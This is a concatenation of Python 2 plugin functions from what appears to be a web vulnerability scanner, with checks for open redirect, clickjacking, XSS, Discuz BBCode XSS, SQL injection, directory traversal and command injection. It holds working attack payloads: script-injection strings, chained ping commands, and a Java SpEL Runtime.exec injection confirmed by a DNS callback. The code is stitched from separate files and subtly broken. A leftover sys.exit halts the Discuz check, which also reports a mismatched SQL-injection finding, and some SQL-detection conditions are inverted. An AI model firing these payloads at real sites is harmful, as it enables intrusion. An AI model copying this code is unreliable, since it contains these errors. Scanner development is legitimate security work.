def run_url(http, ob, item): header = { "Host": ob['domain'], "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache", "Referer": item['refer'], "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", # "Cookie": ob.get('cookie') } try: path = item['url'] method = item['method'] timeout = ob.get('webTimeout') http = Http(timeout=timeout) url_parse = urlparse(path) netloc = url_parse.netloc source_ip = ob.get('source_ip') if source_ip: netloc = source_ip query_dict = post_query2dict(path) result = [] for key in query_dict.keys(): url2 = getDomain(query_dict[key]) print url2 if url2: query_dict[key] = 'http://openresty.org/cn/' print(query_dict[key]) new_query = dict2query(query_dict) new_url = "%s://%s%s?%s" % (url_parse.scheme, netloc, url_parse.path, new_query) # print new_url res, content = http.request(new_url, 'GET', headers=header) c = re.search('''OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。''', content) if c: response = getResponse(res, content, 'OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。') request = getRequest(path, 'POST', headers=header, domain=ob['domain']) detail = "存在任意网址跳转漏洞" result.append( getRecord(ob, path, ob['level'], detail, request, response)) return result except Exception, e: logger.error("File:PageredirectsScript_yd.py, run_url function :%s" % (str(e))) return result
def run_url(http, config, item): ''' 重写run_url函数,实现检测SQL注入的功能 有异常时,直接输出异常 无异常时,以list类型返回检测结果记录 ''' try: #重新组织请求的参数 scanInfo = {} scanInfo['siteId'] = config['siteId'] scanInfo['ip'] = config['ip'] scanInfo['domain'] = config['domain'] scanInfo['level'] = config['level'] scanInfo['vulId'] = config['vulId'] headers = headerDictDefault headers['cookie'] = config['cookie'] headers['Host'] = config['domain'] source_ip = config.get('source_ip') responseList = [] url = item['url'] url_parse = urlparse.urlparse(url) scheme = url_parse.scheme domain = url_parse.netloc path = url_parse.path query = url_parse.query if source_ip: domain = source_ip if query: new_url = "%s://%s%s?%s" % (scheme, domain, path, query) else: new_url = "%s://%s%s" % (scheme, domain, path) if item['method'].lower() == 'get': #get url = "%s?%s" % (new_url, item['params']) bodyDict={} else: #post url = new_url bodyDict = db_params2dict(item['params']) urlBase, queryDict = post_all_query2dict(item['url']) response = request(url=url, body=dict2query(bodyDict), headers=headers, method=item['method']) pattern = r'<iframe.*?src="(.*?)"' matches = re.findall(pattern, response['response_body']) for row in matches: parse = urlparse.urlparse(row) if scanInfo['domain'] != parse.netloc: injectInfo = returnInjectResult(url=url, confirm=0, detail='点击劫持,iframe连接到了外站', response=response) responseList.append(getRecord2(scanInfo, injectInfo)) return responseList else: print scanInfo['domain'], parse.netloc except Exception,e: logger.error("File:ClickJacking_iframe.py, run_url function :%s" % (str(e))) return []
def run_url(http, ob, item): method = item.get('method') method = method.lower() if method not in ['get', 'post']: return [] params = item.get('params') inj_list = [ # '''<sCrIpt>alert(123)</ScRiPt>''', # ''''><sCrIpt>alert(123)</ScRiPt>''', # '''"><sCrIpt>alert(123)</ScRiPt>''', # '''';</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''', # '''";</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''', '''-->''''''"""""">>>>>>;;;;;;</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''', '''-->''''''"""""">>>>>>;;;;;;<source%20onerror="javascript:alert(123)">''', '''-->''''''"""""">>>>>>;;;;;;<img src=1 onerror=alert(1)>''' ] url = item['url'] scheme = ob['scheme'] domain = ob['domain'] header = {'Host': domain} source_ip = ob.get('source_ip') if source_ip: domain = source_ip url_path = urlparse.urlparse(url).path result = [] re_obj = re.compile('(<script>alert\(123\)</script>|javascript:alert\(123\)">|onerror=alert\(1\)>)') detail = "检测到XSS漏洞" try: # get 方法 if method == 'get': # 没有参数,就直接路径注入 if not params: for payload in inj_list: if not url_path or url_path[-1] != '/': payload = '/' + payload new_url = '%s://%s%s%s' % (scheme, domain, url_path, payload) res, content = http.request(url=new_url, method='GET', headers=header) if re_obj.search(content, re.I): request = getRequest(new_url, domain=ob['domain']) response = getResponse(res, content) result.append(getRecord(ob, new_url, ob['level'], detail, request, response)) # 有参数就参数注入,query注入 else: query_dict = query2dict(params) for payload in inj_list: for k, v in query_dict.iteritems(): query_dict_cp = deepcopy(query_dict) if v: query_dict_cp[k] = str(v) + payload else: query_dict_cp[k] = '1' + payload new_query = dict2query(params_dict=query_dict_cp, isUrlEncode=True) new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query) res, content = http.request(url=new_url, method='GET', headers=header) # if res.get('status') and res.get('status') == '200': if re_obj.search(content, re.I): request = getRequest(new_url, domain=ob['domain']) response = getResponse(res, content) result.append(getRecord(ob, new_url, ob['level'], detail, request, response)) # post 方法 else: query = urlparse.urlparse(url).query body = item.get('params') # query 部分注入,body不变 if query: body_str = None if body: body_dict = db_params2dict(body) body_str = dict2query(params_dict=body_dict, isUrlEncode=False) query_dict = query2dict(query) for payload in inj_list: for k, v in query_dict.iteritems(): query_dict_cp = deepcopy(query_dict) if v: query_dict_cp[k] = str(v) + payload else: query_dict_cp[k] = '1' + payload new_query = dict2query(params_dict=query_dict_cp, isUrlEncode=True) new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query) res, content = http.request(url=new_url, method='POST', headers=header, body=body_str) # if res.get('status') and res.get('status') == '200': if re_obj.search(content, re.I): request = postRequest(new_url, domain=ob['domain']) response = getResponse(res, content) result.append(getRecord(ob, new_url, ob['level'], detail, request, response)) # body部分注入,query不变 if body: params_dict = db_params2dict(body) for payload in inj_list: for k, v in params_dict.iteritems(): params_dict_cp = deepcopy(params_dict) if v: params_dict_cp[k] = str(v) + payload else: params_dict_cp[k] = '1' + payload new_params = dict2query(params_dict=params_dict_cp, isUrlEncode=False) new_url = '%s://%s%s?%s' % (scheme, domain, url_path, query) res, content = http.request(url=new_url, method='POST', headers=header, body=new_params) # if res.get('status') and res.get('status') == '200': if re_obj.search(content, re.I): request = postRequest(new_url, domain=ob['domain']) response = getResponse(res, content) result.append(getRecord(ob, new_url, ob['level'], detail, request, response)) except Exception, e: logger.error("File:xss_inject_new.py, run_url function get method:%s" % (str(e)))
def run_domain(http, config): ''' 重写run_url函数,实现检测SQL注入的功能 有异常时,直接输出异常 无异常时,以list类型返回检测结果记录 ''' # 重新组织请求的参数 scanInfo = {} scanInfo['siteId'] = config['siteId'] scanInfo['ip'] = config['ip'] scanInfo['scheme'] = config['scheme'] scanInfo['domain'] = config['domain'] scanInfo['level'] = config['level'] scanInfo['vulId'] = config['vulId'] # headers = headerDictDefault headers = { 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'keep-alive', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', # 'Host': 'discuzx15.target.safety.local.com', 'Cache-Control': 'max-age=0', 'Host': config['domain'] } headers['cookie'] = config['cookie'] # print scanInfo responseList = [] try: source_ip = config.get('source_ip') if source_ip: urlBase = scanInfo['scheme'] + "://" + source_ip else: urlBase = scanInfo['scheme'] + "://" + scanInfo['domain'] urlForum = urlBase + "/forum.php" response = request(url=urlForum, headers=headers, method="GET") # 状态码不正确,退出 if response['httpcode'] != 200: return [] # patternForumid = re.compile(r'<td\sclass\="fl_icn"\s*><a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I|re.M|re.S) patternForumid = re.compile(r'<a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I | re.M | re.S) tmpResult = patternForumid.findall(response['response_body']) # print response['response_body'] # print response['response_headers'] # 没有找到相应的版块,程序退出 if not tmpResult: return [] forumids = list(set(tmpResult)) forumid = forumids[0] newthreadUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid headers['Referer'] = urlBase + "/forum.php?mod=forumdisplay&fid=" + forumid response = request(url=newthreadUrl, headers=headers, method="GET") # print response['httpcode'] if response['httpcode'] != 200: return [] print response['response_body'] # print len(newthreadUrl), newthreadUrl # print headers # print response['httpcode'] # patternForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"', re.I|re.M|re.S) # patternPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"', re.I|re.M|re.S) # tmpForumhash = patternForumhash.findall(response['response_body']) # tmpPosttime = patternPosttime.findall(response['response_body']) tmpForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"', re.I | re.M | re.S).findall(response['response_body']) tmpPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"', re.I | re.M | re.S).findall(response['response_body']) # tmpTid = re.compile(r'<input\s+type="hidden"\s+name\="tid"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body']) # patternTid = re.compile(r'name\="tid"\svalue\="(.*?)"', re.I|re.M|re.S) # patternTid = re.compile(r'"tid"\s*value\="(.*?)"', re.I) # tmpTid = patternTid.findall(response['response_body']) # tmpPid = re.compile(r'<input\s+type="hidden"\s+name\="pid"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body']) # tmpPage = re.compile(r'<input\s+type="hidden"\s+name\="page"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body']) print tmpForumhash print tmpPosttime # print tmpTid # print tmpPid # print tmpPage # sys.exit(1) formdata = {} formdata['forumhash'] = tmpForumhash[0] formdata['posttime'] = tmpPosttime[0] formdata['subject'] = '这里是测试xss_bbcode帖子' formdata['message'] = '[email=2"onmouseover="alert(\'tester_xss_bbcode\')]2[/email]' formdata['wysiwyg'] = '1' formdata['fid'] = forumid # formdata['tid'] = tmpTid[0] # formdata['pid'] = tmpPid[0] # formdata['page'] = tmpPage[0] formdata['checkbox'] = 0 postUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid + "&extra=&topicsubmit=yes" body = dict2query(formdata) headers['Referer'] = newthreadUrl response = request(url=postUrl, body=body, headers=headers, method="POST") # print response if response['httpcode'] != 200: return [] print response['response_body'] sys.exit(1) patternEdit = re.compile(r'<a\sclass\="editp"\shref\s="(.*?)">编辑<\/a>', re.I | re.M | re.S) patternEdit.findall(response['response_body']) response = request(url=postUrl, headers=headers, method="GET") patternXssBbcode = re.compile(r'alert\(\'tester_xss_bbcode\'\)', re.I | re.M | re.S) match = patternXssBbcode.match(response['response_body']) if match: injectInfo = returnInjectResult(url=urlBase, confirm=1, detail="Discuz! X1-1.5 的 notify_credit.php 文件由于没有对用户输入进行有效的过滤导致存在SQL盲注", response=response) responseList.append(getRecord2(scanInfo, injectInfo)) return responseList except Exception, e: logger.error("File:DiscuzX15_notify_credit.py:" + str(e))
def run_inj(http, ob, item, payloads, inj_type=None): method = item.get('method') if not method: return [] method = method.lower() if method not in ['get', 'post']: return [] params = item.get('params') if not params: return [] url = item['url'] scheme = ob['scheme'] domain = ob['domain'] header = {'Host': domain} source_ip = ob.get('source_ip') if source_ip: domain = source_ip url_path = urlparse.urlparse(url).path result = [] try: # get 方法 if method.lower() == 'get': query_dict = query2dict(params) for k, v in query_dict.iteritems(): query_dict_cp = deepcopy(query_dict) payload_t, payload_f = payloads if v: query_dict_cp[k] = v + payload_t else: query_dict_cp[k] = '1' + payload_t query_t = dict2query(params_dict=query_dict_cp, isUrlEncode=True) if v: query_dict_cp[k] = v + payload_f else: query_dict_cp[k] = '1' + payload_f query_f = dict2query(params_dict=query_dict_cp, isUrlEncode=True) url_t = '%s://%s%s?%s' % (scheme, domain, url_path, query_t) url_f = '%s://%s%s?%s' % (scheme, domain, url_path, query_f) res_t, content_t = http.request(url=url_t, method='GET', headers=header) res_f, content_f = http.request(url=url_f, method='GET', headers=header) status_t = res_t.get('status', '0') status_f = res_f.get('status', '0') if "ERROR型" == inj_type: res_d, db_type_d, msg_d = check_db_error(content_t) # if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))): if res_d: detail = "检测到 %s sql注入漏洞" % inj_type request = getRequest(url_t, domain=ob['domain']) response = getResponse(res_t, content_t) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, url_t, ob['level'], detail, request, response)) else: res_s, db_type_s, msg_s = check_db_error(content_f) # if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))): if res_s: detail = "检测到 %s sql注入漏洞" % inj_type request = getRequest(url_f, domain=ob['domain']) response = getResponse(res_f, content_f) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, url_f, ob['level'], detail, request, response)) else: similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f) similar_waf = page_similar(status_t, content_t, ob.get('waf_page')) if not similar and not similar_waf: detail = "检测到 %s sql注入漏洞" % inj_type logger.error( "status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (status_t, status_f, content_t, content_f)) request = getRequest(url_f, domain=ob['domain']) response = getResponse(res_f, content_f) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, url_f, ob['level'], detail, request, response)) # post 方法 else: query = urlparse.urlparse(url).query body = item.get('params') # query 部分注入,body不变 if query: body_str = '' if body: body_dict = db_params2dict(body) body_str = dict2query(params_dict=body_dict, isUrlEncode=True) query_dict = query2dict(query) for k, v in query_dict.iteritems(): query_dict_cp = deepcopy(query_dict) payload_t, payload_f = payloads if v: query_dict_cp[k] = v + payload_t else: query_dict_cp[k] = '1' + payload_t query_t = dict2query(params_dict=query_dict_cp, isUrlEncode=True) if v: query_dict_cp[k] = v + payload_f else: query_dict_cp[k] = '1' + payload_f query_f = dict2query(params_dict=query_dict_cp, isUrlEncode=True) url_t = '%s://%s%s?%s' % (scheme, domain, url_path, query_t) url_f = '%s://%s%s?%s' % (scheme, domain, url_path, query_f) res_t, content_t = http.request(url=url_t, method='POST', headers=header, body=body_str) res_f, content_f = http.request(url=url_f, method='POST', headers=header, body=body_str) status_t = res_t.get('status', '0') status_f = res_f.get('status', '0') if "ERROR型" == inj_type: res_d, db_type_d, msg_d = check_db_error(content_t) # if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))): if res_d: detail = "检测到 %s sql注入漏洞" % inj_type request = postRequest(url_t, body=body_str, domain=ob['domain']) response = getResponse(res_t, content_t) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, url_t, ob['level'], detail, request, response)) else: res_s, db_type_s, msg_s = check_db_error(content_f) # if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))): if res_s: detail = "检测到 %s sql注入漏洞" % inj_type request = postRequest(url_t, body=body_str, domain=ob['domain']) response = getResponse(res_f, content_f) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, url_f, ob['level'], detail, request, response)) else: similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f) similar_waf = page_similar(status_t, content_t, ob.get('waf_page')) if not similar and similar_waf: detail = "检测到 %s sql注入漏洞" % inj_type request = postRequest(url_t, body=body_str, domain=ob['domain']) response = getResponse(res_f, content_f) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, url_f, ob['level'], detail, request, response)) # body部分注入,query不变 if body: params_dict = db_params2dict(body) for k, v in params_dict.iteritems(): params_dict_cp = deepcopy(params_dict) payload_t, payload_f = payloads if v: params_dict_cp[k] = v + payload_t else: params_dict_cp[k] = '1' + payload_t params_t = dict2query(params_dict=params_dict_cp, isUrlEncode=True) if v: params_dict_cp[k] = v + payload_f else: params_dict_cp[k] = '1' + payload_f params_f = dict2query(params_dict=params_dict_cp, isUrlEncode=True) new_url = '%s://%s%s?%s' % (scheme, domain, url_path, query) res_t, content_t = http.request(url=new_url, method='POST', headers=header, body=params_t) res_f, content_f = http.request(url=new_url, method='POST', headers=header, body=params_f) status_t = res_t.get('status', '0') status_f = res_f.get('status', '0') if "ERROR型" == inj_type: res_d, db_type_d, msg_d = check_db_error(content_t) # if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))): if res_d: detail = "检测到 %s sql注入漏洞" % inj_type request = postRequest(new_url, body=params_t, domain=ob['domain']) response = getResponse(res_t, content_t) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, new_url, ob['level'], detail, request, response)) else: res_s, db_type_s, msg_s = check_db_error(content_f) # if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))): if res_s: detail = "检测到 %s sql注入漏洞" % inj_type request = postRequest(new_url, body=params_f, domain=ob['domain']) response = getResponse(res_f, content_f) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, new_url, ob['level'], detail, request, response)) else: similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f) similar_waf = page_similar(status_t, content_t, ob.get('waf_page')) if not similar and similar_waf: detail = "检测到 %s sql注入漏洞" % inj_type request = postRequest(new_url, body=params_f, domain=ob['domain']) response = getResponse(res_f, content_f) # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % ( # status_t, status_f, content_t, content_f)) result.append( getRecord(ob, new_url, ob['level'], detail, request, response)) except Exception, e: logger.error("File:sql_inject_new.py, run_url function:%s" % (str(e)))
def run_url(http, ob, item): header = { "Pragma": "no-cache", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Cache-Control": "no-cache", "Cookie": ob.get('cookie') if ob.get('cookie') else '', "Connection": "keep-alive", "Host": ob['domain'] } result = [] try: url = item.get('url') params = item.get('params') method = item.get('method') source_ip = ob.get('source_ip') url_parse = urlparse(url) scheme = url_parse.scheme domain = url_parse.netloc path = url_parse.path query = url_parse.query if source_ip: domain = source_ip # 没有参数就不扫 if not params and not query: return [] # get方法 if method.lower() == 'get': if params: query = params if query and re.search('page|download|path|file|target', query, re.I): query_dict = query2dict(query) for key in query_dict.keys(): if re.search('page|download|path|file|target', key, re.I): for inj_value in inj_path_list: query_bak = deepcopy(query_dict) query_bak[key] = inj_value new_query = dict2query(query_bak, isUrlEncode=False) new_url = "%s://%s%s?%s" % (scheme, domain, path, new_query) data = traversal_params(ob, http, new_url, 'GET', '', header) if data: result.extend(data) break elif method.lower() == 'post': body_dict = db_params2dict(params) # 注入query,body不变 if query and re.search('page|download|path|file|target', query, re.I): query_dict = query2dict(query) for key in query_dict.keys(): if re.search('page|download|path|file|target', key, re.I): for inj_value in inj_path_list: query_bak = deepcopy(query_dict) query_bak[key] = inj_value new_query = dict2query(query_bak, isUrlEncode=False) new_url = "%s://%s%s?%s" % (scheme, domain, path, new_query) data = traversal_params( ob, http, new_url, 'POST', dict2query(body_dict, isUrlEncode=False), header) if data: result.extend(data) break if body_dict and re.search('page|download|path|file|target', str(params), re.I): new_url = "%s://%s%s?%s" % (scheme, domain, path, query) for key in body_dict.keys(): if re.search('page|download|path|file|target', key, re.I): for inj_value in inj_path_list: body_bak = deepcopy(body_dict) body_bak[key] = inj_value new_body = dict2query(body_bak, isUrlEncode=False) data = traversal_params(ob, http, new_url, 'POST', new_body, header) if data: result.extend(data) break except Exception, e: logger.error("File:dir_traversal_win_url.py, run_url function :%s" % (str(e)))
def run_url(http, ob, item): result = [] try: method = item['method'] domain = ob['domain'] header = { 'Host': domain, 'Cookie': ob['cookie'] if ob['cookie'] else '' } source_ip = ob.get('source_ip') url = item['url'] params = item['params'] # p1 = r'\bexec\b|command|\bcmd\b' # p2 = r'command|\bcmd\b' # if not params: # return result # if not (re.search(p1, url, re.I) or re.search(p2, params, re.I|re.M)): # return result url_parse = urlparse(url) scheme = url_parse.scheme domain = url_parse.netloc path = url_parse.path query = url_parse.query if source_ip: domain = source_ip # if query: # url = "%s://%s%s?%s" % (scheme, domain, path, query) # else: # url = "%s://%s%s" % (scheme, domain, path) # get 方法 if method.lower() == 'get': query_dict = query2dict(params) for k, v in query_dict.items(): random_str, ping_cmd_list = _cmd_poc() for ping_cmd in ping_cmd_list: query_dict_cp = deepcopy(query_dict) if v: query_dict_cp[k] = v + ';' + ping_cmd else: query_dict_cp[k] = ';' + ping_cmd query_cmd = dict2query(params_dict=query_dict_cp, isUrlEncode=True) cmd_url = '%s://%s%s?%s' % (scheme, domain, path, query_cmd) res, content = http.request(url=cmd_url, method='GET', headers=header) if callback(random_str): detail = "通过dns log检测到命令执行漏洞" request = getRequest(cmd_url, domain=ob['domain']) response = getResponse(res) result.append( getRecord(ob, cmd_url, ob['level'], detail, request, response)) break # 增加参数名注入检测 kk = query_dict.keys()[0] vv = query_dict[kk] random_str, ping_cmd_list = _cmd_poc() for ping_cmd in ping_cmd_list: kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % ( kk, ping_cmd) cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" % (kk, vv)) res, content = http.request(url=cmd_url, method='GET', headers=header) if callback(random_str): detail = "通过dns log检测到命令执行漏洞" request = getRequest(cmd_url, domain=ob['domain']) response = getResponse(res) result.append( getRecord(ob, cmd_url, ob['level'], detail, request, response)) break else: body = params # query 部分注入,body不变 if query: body_str = '' if body: body_dict = db_params2dict(body) body_str = dict2query(params_dict=body_dict, isUrlEncode=True) query_dict = query2dict(params) for k, v in query_dict.items(): random_str, ping_cmd_list = _cmd_poc() for ping_cmd in ping_cmd_list: query_dict_cp = deepcopy(query_dict) if v: query_dict_cp[k] = v + ';' + ping_cmd else: query_dict_cp[k] = ';' + ping_cmd query_cmd = dict2query(params_dict=query_dict_cp, isUrlEncode=True) cmd_url = '%s://%s%s?%s' % (scheme, domain, path, query_cmd) res, content = http.request(url=cmd_url, method='POST', body=body_str, headers=header) if callback(random_str): detail = "通过dns log检测到命令执行漏洞" request = getRequest(cmd_url, domain=ob['domain']) response = getResponse(res) result.append( getRecord(ob, cmd_url, ob['level'], detail, request, response)) break # 增加参数名注入检测 kk = query_dict.keys()[0] vv = query_dict[kk] random_str, ping_cmd_list = _cmd_poc() for ping_cmd in ping_cmd_list: kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % ( kk, ping_cmd) cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" % (kk, vv)) res, content = http.request(url=cmd_url, method='GET', headers=header) if callback(random_str): detail = "通过dns log检测到命令执行漏洞" request = getRequest(cmd_url, domain=ob['domain']) response = getResponse(res) result.append( getRecord(ob, cmd_url, ob['level'], detail, request, response)) break if body: params_dict = db_params2dict(body) for k, v in params_dict.iteritems(): random_str, ping_cmd_list = _cmd_poc() for ping_cmd in ping_cmd_list: params_dict_cp = deepcopy(params_dict) if v: params_dict_cp[k] = v + ';' + ping_cmd else: params_dict_cp[k] = ';' + ping_cmd params_cmd = dict2query(params_dict=params_dict_cp, isUrlEncode=True) cmd_url = '%s://%s%s?%s' % (scheme, domain, path, query) res, content = http.request(url=cmd_url, method='POST', body=params_cmd, headers=header) if callback(random_str): detail = "通过dns log检测到命令执行漏洞" request = getRequest(cmd_url, domain=ob['domain']) response = getResponse(res) result.append( getRecord(ob, cmd_url, ob['level'], detail, request, response)) break # 增加参数名注入检测 kk = params_dict.keys()[0] vv = params_dict[kk] random_str, ping_cmd_list = _cmd_poc() for ping_cmd in ping_cmd_list: kk = "%s[T(java.lang.Runtime).getRuntime().exec(\"%s\")/sslegend]" % ( kk, ping_cmd) cmd_url = '%s://%s%s?%s' % (scheme, domain, path, "%s=%s" % (kk, vv)) res, content = http.request(url=cmd_url, method='GET', headers=header) if callback(random_str): detail = "通过dns log检测到命令执行漏洞" request = getRequest(cmd_url, domain=ob['domain']) response = getResponse(res) result.append( getRecord(ob, cmd_url, ob['level'], detail, request, response)) break except Exception, e: logger.error("File:exec_cmd_dns_log.py, run_domain function :%s" % (str(e)))